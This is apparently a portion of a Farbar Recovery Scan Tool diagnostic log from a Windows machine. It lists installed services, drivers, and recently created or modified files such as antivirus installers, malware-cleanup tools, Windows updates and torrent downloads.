S2 avgfws; C:\Program Files (x86)\AVG\AVG2014\avgfws.exe [1358944 2013-09-24] (AVG Technologies CZ, s.r.o.)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe [3478544 2013-11-11] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe [348008 2013-09-24] (AVG Technologies CZ, s.r.o.)
S3 EWSASERV; C:\Program Files (x86)\Elcomsoft Password Recovery\Elcomsoft Wireless Security Auditor\ewsaserv64.exe [82224 2011-04-16] (ElcomSoft Co. Ltd.)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [418376 2013-04-04] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [701512 2013-04-04] (Malwarebytes Corporation)
R2 McciCMService64; C:\Program Files\Common Files\Motive\McciCMService.exe [517632 2010-02-02] (Alcatel-Lucent)
R2 MSSQL$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe [57617752 2009-03-30] (Microsoft Corporation)
R2 NgVpnMgr; C:\Windows\system32\ngvpnmgr.exe [534824 2013-04-12] (Aventail Corporation)
R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
S4 RemoteAccess; C:\Windows\System32\svchost.exe [27136 2009-07-13] (Microsoft Corporation)
S4 SQLAgent$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [427880 2009-03-30] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

S3 anvsnddrv; C:\Windows\System32\drivers\anvsnddrv.sys [33872 2011-11-28] (AnvSoft Inc.)
R3 AnyDVD; C:\Windows\System32\Drivers\AnyDVD.sys [125512 2010-12-01] (SlySoft, Inc.)
R3 AnyDVD; C:\Windows\SysWow64\Drivers\AnyDVD.sys [125512 2010-12-01] (SlySoft, Inc.)
S1 ASPI32; C:\Windows\SysWow64\Drivers\ASPI32.sys [25244 1999-09-10] (Adaptec)
R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [150808 2013-11-05] (AVG Technologies CZ, s.r.o.)
R1 Avgfwfd; C:\Windows\System32\DRIVERS\avgfwd6a.sys [57144 2013-09-26] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [240920 2013-11-04] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [194872 2013-10-24] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [212280 2013-10-31] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [294712 2013-10-31] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [123704 2013-10-01] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [31544 2013-09-10] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [251192 2013-08-01] (AVG Technologies CZ, s.r.o.)
R3 ElbyCDFL; C:\Windows\System32\Drivers\ElbyCDFL.sys [40648 2007-02-15] (SlySoft, Inc.)
R3 ElbyCDFL; C:\Windows\SysWow64\Drivers\ElbyCDFL.sys [40648 2007-02-15] (SlySoft, Inc.)
S3 Generalusbserialser20675; C:\Windows\System32\DRIVERS\CT_U_USBSER.sys [122368 2011-05-09] (Incorporated)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25928 2013-04-04] (Malwarebytes Corporation)
S2 MCSTRM; No ImagePath
S3 MREMP50; C:\Program Files (x86)\Common Files\Motive\MREMP50.sys [21248 2010-01-28] (Printing Communications Assoc., Inc. (PCAUSA))
S3 MRESP50; C:\Program Files (x86)\Common Files\Motive\MRESP50.sys [20096 2010-01-28] (Printing Communications Assoc., Inc. (PCAUSA))
S3 NgFilter; C:\Windows\System32\DRIVERS\ngfilter.sys [26184 2013-04-12] (Aventail Corporation)
R3 NgLog; C:\Windows\System32\DRIVERS\nglog.sys [31304 2013-04-12] (Aventail Corporation)
R3 NgVpn; C:\Windows\System32\DRIVERS\ngvpn.sys [103496 2013-04-12] (Aventail Corporation)
R3 NgWfp; C:\Windows\System32\DRIVERS\ngwfp.sys [28744 2013-04-12] (Aventail Corporation)
S3 pwdrvio; C:\Windows\system32\pwdrvio.sys [19032 2012-08-20] ()
S3 pwdspio; C:\Windows\system32\pwdspio.sys [12384 2012-08-20] ()
S3 RSUSBSTOR; C:\Windows\SysWow64\Drivers\RtsUStor.sys [225280 2009-09-22] (Realtek Semiconductor Corp.)
U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Corporation)
S3 catchme; \??\C:\ComboFix\catchme.sys [x]
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [x]
S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [x]
S3 MREMP50a64; \??\C:\PROGRA~1\COMMON~1\Motive\MREMP50a64.SYS [x]
S3 MREMPR5; \??\C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS [x]
S3 MRENDIS5; \??\C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS [x]
S3 MRESP50a64; \??\C:\PROGRA~1\COMMON~1\Motive\MRESP50a64.SYS [x]
S1 SydexFDD; system32\drives\sydexfdd.sys [x]
U2 TMAgent;

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2013-12-10 19:07 - 2013-12-10 19:08 - 00030449 _____ C:\Users\Jon Lowry\Downloads\FRST.txt
2013-12-10 19:07 - 2013-12-10 19:07 - 00000000 ____D C:\Users\Jon Lowry\AppData\Local\Sony Online Entertainment
2013-12-10 19:06 - 2013-12-10 19:06 - 01928212 _____ (Farbar) C:\Users\Jon Lowry\Downloads\FRST64.exe
2013-12-10 19:06 - 2013-12-10 19:06 - 00000000 ____D C:\FRST
2013-12-10 19:01 - 2013-12-10 19:01 - 00000000 ____D C:\Users\Jon Lowry\AppData\Roaming\AVG2014
2013-12-10 19:00 - 2013-12-10 19:00 - 00000965 _____ C:\Users\Public\Desktop\AVG 2014.lnk
2013-12-10 18:56 - 2013-12-10 19:00 - 00000000 ____D C:\ProgramData\AVG2014
2013-12-10 18:56 - 2013-12-10 18:56 - 00000000 ___HD C:\$AVG
2013-12-10 18:55 - 2013-12-10 18:55 - 03386520 _____ (AVG Technologies CZ, s.r.o.) C:\Users\Jon Lowry\Downloads\avg_remover_stf_x86_2014_4116.exe
2013-12-10 18:55 - 2013-12-10 18:41 - 00471285 _____ C:\Users\Jon Lowry\Downloads\avgremover.log
2013-12-10 18:54 - 2013-12-10 18:54 - 00000000 ____D C:\Program Files (x86)\AVG
2013-12-10 18:51 - 2013-12-10 19:06 - 00000000 ____D C:\ProgramData\MFAData
2013-12-10 18:51 - 2013-12-10 19:00 - 00000000 ____D C:\Users\Jon Lowry\AppData\Local\Avg2014
2013-12-10 18:51 - 2013-12-10 18:51 - 00000000 ____D C:\Users\Jon Lowry\AppData\Local\MFAData
2013-12-10 18:50 - 2013-12-10 18:50 - 04436952 _____ (AVG Technologies) C:\Users\Jon Lowry\Downloads\avg_isct_stb_all_2014_4259.exe
2013-12-10 18:43 - 2013-12-10 18:43 - 00003758 _____ C:\Windows\System32\Tasks\AutoKMS
2013-12-10 18:40 - 2013-12-10 18:40 - 00000296 _____ C:\Windows\PFRO.log
2013-12-10 18:40 - 2013-12-10 18:40 - 00000112 _____ C:\Windows\setupact.log
2013-12-10 18:40 - 2013-12-10 18:40 - 00000000 _____ C:\Windows\setuperr.log
2013-12-10 18:36 - 2013-12-10 18:36 - 00000000 ____D C:\Users\Jon Lowry\AppData\Local\{29FDA4EE-C07E-46A6-884F-DB0975D8892B}
2013-12-10 00:24 - 2013-12-10 00:24 - 00012015 _____ C:\Users\Jon Lowry\Downloads\[kickass.to]the.sound.of.music.1965.720p.brrip.x264.yify.torrent
2013-12-10 00:24 - 2013-12-10 00:24 - 00012015 _____ C:\Users\Jon Lowry\Downloads\[kickass.to]the.sound.of.music.1965.720p.brrip.x264.yify (1).torrent
2013-12-08 22:39 - 2013-12-08 22:39 - 00003191 _____ C:\Users\Jon Lowry\Downloads\[kickass.to]divergent.trilogy.epub.tgfb.torrent
2013-12-08 22:38 - 2013-12-08 22:38 - 00004948 _____ C:\Users\Jon Lowry\Downloads\Veronica+Roth+Divergent+1-2.torrent
2013-12-08 22:38 - 2013-12-08 22:38 - 00004948 _____ C:\Users\Jon Lowry\Downloads\Veronica+Roth+Divergent+1-2 (1).torrent
2013-12-07 18:18 - 2013-12-07 18:18 - 01110034 _____ C:\Users\Jon Lowry\Desktop\AdwCleaner.exe
2013-12-07 18:18 - 2013-12-07 18:18 - 01034531 _____ (Thisisu) C:\Users\Jon Lowry\Desktop\JRT.exe
2013-12-07 18:11 - 2013-12-07 18:11 - 01034531 _____ (Thisisu) C:\Users\Jon Lowry\Downloads\JRT.exe
2013-12-06 15:41 - 2013-12-06 15:41 - 00000000 ____D C:\Users\Jon Lowry\AppData\Roaming\AVAST Software
2013-12-06 15:39 - 2013-12-06 15:39 - 01032416 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2013-12-06 15:39 - 2013-12-06 15:39 - 00409832 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2013-12-06 15:39 - 2013-12-06 15:39 - 00334648 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2013-12-06 15:39 - 2013-12-06 15:39 - 00205320 _____ C:\Windows\system32\Drivers\aswVmm.sys
2013-12-06 15:39 - 2013-12-06 15:39 - 00092544 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2013-12-06 15:39 - 2013-12-06 15:39 - 00084328 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2013-12-06 15:39 - 2013-12-06 15:39 - 00065776 _____ C:\Windows\system32\Drivers\aswRvrt.sys
2013-12-06 15:39 - 2013-12-06 15:39 - 00065264 _____ (AVAST Software) C:\Windows\system32\Drivers\aswTdi.sys
2013-12-06 15:39 - 2013-12-06 15:39 - 00043152 _____ (AVAST Software) C:\Windows\avastSS.scr
2013-12-06 15:39 - 2013-12-06 15:39 - 00038984 _____ (AVAST Software) C:\Windows\system32\Drivers\aswFsBlk.sys
2013-12-06 15:39 - 2013-12-06 15:39 - 00003924 _____ C:\Windows\System32\Tasks\avast! Emergency Update
2013-12-06 15:39 - 2013-12-06 15:39 - 00001966 _____ C:\Users\Public\Desktop\avast! Free Antivirus.lnk
2013-12-06 15:38 - 2013-12-06 15:38 - 00000000 ____D C:\Program Files\AVAST Software
2013-12-06 15:36 - 2013-12-06 15:36 - 00000000 ____D C:\ProgramData\AVAST Software
2013-12-06 15:20 - 2013-10-05 12:25 - 01474048 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2013-12-06 15:20 - 2013-10-05 11:57 - 01168384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2013-12-06 15:20 - 2013-10-03 18:28 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\SmartcardCredentialProvider.dll
2013-12-06 15:20 - 2013-10-03 18:25 - 00197120 _____ (Microsoft Corporation) C:\Windows\system32\credui.dll
2013-12-06 15:20 - 2013-10-03 18:24 - 01930752 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2013-12-06 15:20 - 2013-10-03 17:58 - 00152576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SmartcardCredentialProvider.dll
2013-12-06 15:20 - 2013-10-03 17:56 - 01796096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2013-12-06 15:20 - 2013-10-03 17:56 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credui.dll
2013-12-06 15:20 - 2013-09-27 17:09 - 00497152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2013-12-06 15:19 - 2013-10-11 18:30 - 00830464 _____ (Microsoft Corporation) C:\Windows\system32\nshwfp.dll
2013-12-06 15:19 - 2013-10-11 18:29 - 00859648 _____ (Microsoft Corporation) C:\Windows\system32\IKEEXT.DLL
2013-12-06 15:19 - 2013-10-11 18:29 - 00324096 _____ (Microsoft Corporation) C:\Windows\system32\FWPUCLNT.DLL
2013-12-06 15:19 - 2013-10-11 18:03 - 00656896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nshwfp.dll
2013-12-06 15:19 - 2013-10-11 18:01 - 00216576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FWPUCLNT.DLL
2013-12-06 15:19 - 2013-10-02 18:23 - 00404480 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2013-12-06 15:19 - 2013-10-02 18:00 - 00311808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2013-12-06 15:19 - 2013-09-24 18:26 - 00154560 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2013-12-06 15:19 - 2013-09-24 18:26 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2013-12-06 15:19 - 2013-09-24 18:23 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2013-12-06 15:19 - 2013-09-24 18:23 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2013-12-06 15:19 - 2013-09-24 18:23 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2013-12-06 15:19 - 2013-09-24 18:22 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2013-12-06 15:19 - 2013-09-24 18:21 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2013-12-06 15:19 - 2013-09-24 18:21 - 00307200 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2013-12-06 15:19 - 2013-09-24 17:58 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2013-12-06 15:19 - 2013-09-24 17:57 - 00247808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2013-12-06 15:19 - 2013-09-24 17:57 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2013-12-06 15:19 - 2013-09-24 17:56 - 00220160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2013-12-06 15:19 - 2013-09-24 17:03 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2013-12-06 15:19 - 2013-07-04 04:18 - 00458712 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2013-12-06 15:13 - 2013-10-12 00:45 - 02241536 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2013-12-06 15:13 - 2013-10-12 00:45 - 01364992 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2013-12-06 15:13 - 2013-10-12 00:45 - 00051712 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2013-12-06 15:13 - 2013-10-12 00:43 - 19269632 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2013-12-06 15:13 - 2013-10-12 00:43 - 15404544 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2013-12-06 15:13 - 2013-10-12 00:43 - 03959808 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2013-12-06 15:13 - 2013-10-12 00:43 - 02648576 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2013-12-06 15:13 - 2013-10-12 00:43 - 00855552 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2013-12-06 15:13 - 2013-10-12 00:43 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2013-12-06 15:13 - 2013-10-12 00:43 - 00526336 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2013-12-06 15:13 - 2013-10-12 00:43 - 00136704 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll
2013-12-06 15:13 - 2013-10-12 00:43 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2013-12-06 15:13 - 2013-10-12 00:43 - 00053248 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2013-12-06 15:13 - 2013-10-12 00:43 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2013-12-06 15:13 - 2013-10-11 23:03 - 01767936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2013-12-06 15:13 - 2013-10-11 23:03 - 01138176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2013-12-06 15:13 - 2013-10-11 23:02 - 14355968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2013-12-06 15:13 - 2013-10-11 23:02 - 13761024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2013-12-06 15:13 - 2013-10-11 23:02 - 02877952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2013-12-06 15:13 - 2013-10-11 23:02 - 02049024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2013-12-06 15:13 - 2013-10-11 23:02 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2013-12-06 15:13 - 2013-10-11 23:02 - 00493056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2013-12-06 15:13 - 2013-10-11 23:02 - 00391168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2013-12-06 15:13 - 2013-10-11 23:02 - 00109056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesysprep.dll
2013-12-06 15:13 - 2013-10-11 23:02 - 00061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2013-12-06 15:13 - 2013-10-11 23:02 - 00039424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2013-12-06 15:13 - 2013-10-11 23:02 - 00033280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2013-12-06 15:13 - 2013-10-11 22:35 - 02706432 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2013-12-06 15:13 - 2013-10-11 22:08 - 02706432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2013-12-06 15:13 - 2013-10-11 21:44 - 00089600 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe
2013-12-06 15:13 - 2013-10-11 21:15 - 00071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RegisterIEPKEYs.exe
2013-12-06 15:09 - 2013-12-06 15:09 - 00602112 _____ (OldTimer Tools) C:\Users\Jon Lowry\Desktop\OTL.exe
2013-12-06 15:06 - 2013-12-06 15:06 - 00000000 ____D C:\Users\Default\Documents\Visual Studio 2010
2013-12-06 15:06 - 2013-12-06 15:06 - 00000000 ____D C:\Users\Default User\Documents\Visual Studio 2010
2013-12-06 15:03 - 2013-12-06 15:03 - 00045892 _____ C:\ComboFix.txt
2013-12-06 14:55 - 2013-12-10 18:58 - 01542876 _____ C:\Windows\WindowsUpdate.log
2013-12-06 14:53 - 2013-12-06 15:14 - 00000071 _____ C:\Windows\avast5.ini
2013-12-06 00:09 - 2013-12-06 00:09 - 00000000 _____ C:\Users\Jon Lowry\daemonprocess.txt
2013-12-06 00:09 - 2013-12-05 23:56 - 00000000 ____D C:\Users\Jon Lowry\AppData\Local\cache
2013-12-06 00:04 - 2013-12-06 00:04 - 00001109 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2013-12-04 14:13 - 2013-12-04 14:13 - 00288663 _____ C:\Users\Jon Lowry\Downloads\sqlite3.dll
2013-12-02 22:13 - 2013-12-02 22:13 - 00000000 ____D C:\Users\Jon Lowry\Documents\Fax
2013-12-02 22:10 - 2013-12-02 22:11 - 00172693 ____N C:\Windows\hpoins46.dat
2013-12-02 22:10 - 2010-01-30 05:17 - 00000532 ____N C:\Windows\hpomdl46.dat
2013-11-29 22:57 - 2009-07-22 00:17 - 00111640 _____ (Microsoft Corporation) C:\Windows\system32\perf-MSSQL$SQLEXPRESS-sqlctr10.1.2531.0.dll
2013-11-29 22:57 - 2009-07-22 00:17 - 00079896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\perf-MSSQL$SQLEXPRESS-sqlctr10.1.2531.0.dll
2013-11-29 22:57 - 2009-07-22 00:17 - 00078872 _____ (Microsoft Corporation) C:\Windows\system32\perf-SQLAgent$SQLEXPRESS-sqlagtctr10.1.2531.0.dll
2013-11-29 22:57 - 2009-07-22 00:17 - 00050200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\perf-SQLAgent$SQLEXPRESS-sqlagtctr10.1.2531.0.dll
2013-11-29 22:56 - 2013-11-29 22:56 - 00000000 ____D C:\Windows\system32\RsFx
2013-11-29 22:55 - 2013-11-29 22:55 - 00000000 ____D C:\Program Files\Microsoft Visual Studio 9.0
2013-11-29 22:55 - 2013-11-29 22:55 - 00000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 9.0
2013-11-29 22:54 - 2013-11-29 22:54 - 00000000 ____D C:\Windows\SysWOW64\1033
2013-11-29 22:54 - 2013-11-29 22:54 - 00000000 ____D C:\Windows\system32\1033
2013-11-29 22:48 - 2013-11-29 22:48 - 00000000 ____D C:\Program Files\Microsoft Synchronization Services
2013-11-29 22:48 - 2013-11-29 22:48 - 00000000 ____D C:\Program Files\Microsoft SQL Server Compact Edition
2013-11-29 22:48 - 2013-11-29 22:48 - 00000000 ____D C:\Program Files (x86)\Microsoft Synchronization Services
2013-11-29 22:46 - 2013-12-06 15:44 - 00000000 ____D C:\Users\Jon Lowry\Documents\Visual Studio 2010
2013-11-29 22:44 - 2013-11-29 23:00 - 00000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 10.0
2013-11-29 22:43 - 2013-11-29 22:43 - 00000000 ____D C:\Windows\symbols
2013-11-29 22:43 - 2013-11-29 22:43 - 00000000 ____D C:\Program Files\Microsoft Visual Studio 10.0
2013-11-29 22:43 - 2013-11-29 22:43 - 00000000 ____D C:\Program Files\Microsoft Help Viewer
2013-11-29 22:43 - 2013-11-29 22:43 - 00000000 ____D C:\Program Files (x86)\Microsoft SDKs
2013-11-27 00:33 - 2013-11-27 00:33 - 00000000 ____D C:\Recovery
2013-11-26 00:25 - 2013-11-26 00:25 - 00001227 _____ C:\Users\Public\Desktop\WinX DVD Author.lnk
2013-11-26 00:25 - 2013-11-26 00:25 - 00000000 ____D C:\Program Files (x86)\Digiarty
2013-11-20 21:50 - 2013-11-20 21:50 - 00000000 ____D C:\Users\Jon Lowry\AppData\Roaming\SketchUp
2013-11-16 16:28 - 2013-11-16 16:28 - 00675988 _____ C:\Users\Jon Lowry\Desktop\Minecraft.exe
2013-11-15 14:20 - 2013-11-17 23:57 - 00000000 ____D C:\Users\Jon Lowry\AppData\Local\LogMeIn Rescue Applet
2013-11-15 13:49 - 2013-11-15 13:49 - 00001991 _____ C:\Users\Public\Desktop\SEU Explorer.lnk
2013-11-15 13:49 - 2013-11-15 13:49 - 00001938 _____ C:\Users\Public\Desktop\SEU Design.lnk
2013-11-15 13:49 - 2013-11-15 13:49 - 00000000 ____D C:\Users\Public\Documents\Design Era Samples
2013-11-15 13:49 - 1997-03-11 18:26 - 00000042 _____ C:\Windows\BDNET32.INI
2013-11-15 13:46 - 2013-11-15 13:46 - 00000000 ____D C:\Program Files (x86)\Sierra
2013-11-15 13:46 - 2008-06-24 09:48 - 00180224 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\Lfpng14nu.dll
2013-11-15 13:46 - 2008-06-24 09:48 - 00032768 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\lfwmf14nu.dll
2013-11-15 13:46 - 2008-06-24 09:47 - 01101824 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\LTDlgImgEFX14nu.dll
2013-11-15 13:46 - 2008-06-24 09:47 - 00450560 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\LTDlgEfx14nu.dll
2013-11-15 13:46 - 2008-06-24 09:47 - 00380928 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\LFCMP14nu.DLL
2013-11-15 13:46 - 2008-06-24 09:47 - 00217088 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\LFJ2K14nu.dll
2013-11-15 13:46 - 2008-06-24 09:47 - 00040960 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\lfgif14nu.dll
2013-11-15 13:46 - 2008-06-24 09:46 - 01241088 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\LTDlgFile14nu.dll
2013-11-15 13:46 - 2008-06-24 09:46 - 00733184 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\LTDlgClr14nu.dll
2013-11-15 13:46 - 2008-06-24 09:46 - 00548864 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\LTDlgImg14nu.dll
2013-11-15 13:46 - 2008-06-24 09:46 - 00532480 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\LTDlgImgDoc14nu.dll
2013-11-15 13:46 - 2008-06-24 09:46 - 00442368 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\ltkrn14nu.dll
2013-11-15 13:46 - 2008-06-24 09:46 - 00299008 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\ltdlgkrn14nu.dll
2013-11-15 13:46 - 2008-06-24 09:46 - 00266240 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\LTDIS14nu.dll
2013-11-15 13:46 - 2008-06-24 09:46 - 00106496 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\lttwn14nu.dll
2013-11-15 13:46 - 2008-06-23 11:58 - 00028672 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\lftga14nu.dll
2013-11-15 13:46 - 2008-06-23 11:57 - 00032768 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\lfpcx14nu.dll
2013-11-15 13:46 - 2008-06-23 11:54 - 00036864 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\lfbmp14nu.dll
2013-11-15 13:46 - 2008-06-23 11:51 - 01703936 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\LTCLR14nu.dll
2013-11-15 13:46 - 2008-06-23 11:51 - 01085440 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\Ltimg14nu.dll
2013-11-15 13:46 - 2008-06-23 11:51 - 00983040 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\LtDlgRes14nu.dll
2013-11-15 13:46 - 2008-06-23 11:51 - 00241664 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\ltefx14nu.dll
2013-11-15 13:46 - 2008-06-23 11:50 - 00155648 _____ (LEAD Technologies, Inc.) C:\Windows\SysWOW64\ltfil14nu.DLL
2013-11-15 13:46 - 1998-11-27 18:57 - 00006144 _____ (Erik Salaj) C:\Windows\SysWOW64\Drivers\IOPORT.SYS
2013-11-15 13:46 - 1997-12-05 10:46 - 00098304 _____ (Inner Media, Inc.) C:\Windows\SysWOW64\DUNZIP32.DLL
2013-11-15 13:46 - 1997-12-05 10:27 - 00125440 _____ (Inner Media, Inc.) C:\Windows\SysWOW64\DZIP32.DLL
2013-11-15 13:01 - 2013-11-15 13:49 - 00000000 ____D C:\ProgramData\Sierra
2013-11-15 13:01 - 1999-01-09 14:57 - 00005632 _____ (Erik Salaj) C:\Windows\SysWOW64\Drivers\MEMPORT.SYS

==================== One Month Modified Files and Folders =======

2013-12-10 19:13 - 2013-01-15 05:19 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2013-12-10 19:08 - 2013-12-10 19:07 - 00030449 _____ C:\Users\Jon Lowry\Downloads\FRST.txt
2013-12-10 19:08 - 2011-03-28 14:36 - 00000000 ____D C:\Users\Jon Lowry\AppData\Roaming\Azureus
2013-12-10 19:07 - 2013-12-10 19:07 - 00000000 ____D C:\Users\Jon Lowry\AppData\Local\Sony Online Entertainment
2013-12-10 19:06 - 2013-12-10 19:06 - 01928212 _____ (Farbar) C:\Users\Jon Lowry\Downloads\FRST64.exe
2013-12-10 19:06 - 2013-12-10 19:06 - 00000000 ____D C:\FRST
2013-12-10 19:06 - 2013-12-10 18:51 - 00000000 ____D C:\ProgramData\MFAData
2013-12-10 19:01 - 2013-12-10 19:01 - 00000000 ____D C:\Users\Jon Lowry\AppData\Roaming\AVG2014
2013-12-10 19:00 - 2013-12-10 19:00 - 00000965 _____ C:\Users\Public\Desktop\AVG 2014.lnk
2013-12-10 19:00 - 2013-12-10 18:56 - 00000000 ____D C:\ProgramData\AVG2014
2013-12-10 19:00 - 2013-12-10 18:51 - 00000000 ____D C:\Users\Jon Lowry\AppData\Local\Avg2014
2013-12-10 18:58 - 2013-12-06 14:55 - 01542876 _____ C:\Windows\WindowsUpdate.log
2013-12-10 18:56 - 2013-12-10 18:56 - 00000000 ___HD C:\$AVG
2013-12-10 18:55 - 2013-12-10 18:55 - 03386520 _____ (AVG Technologies CZ, s.r.o.) C:\Users\Jon Lowry\Downloads\avg_remover_stf_x86_2014_4116.exe
2013-12-10 18:54 - 2013-12-10 18:54 - 00000000 ____D C:\Program Files (x86)\AVG
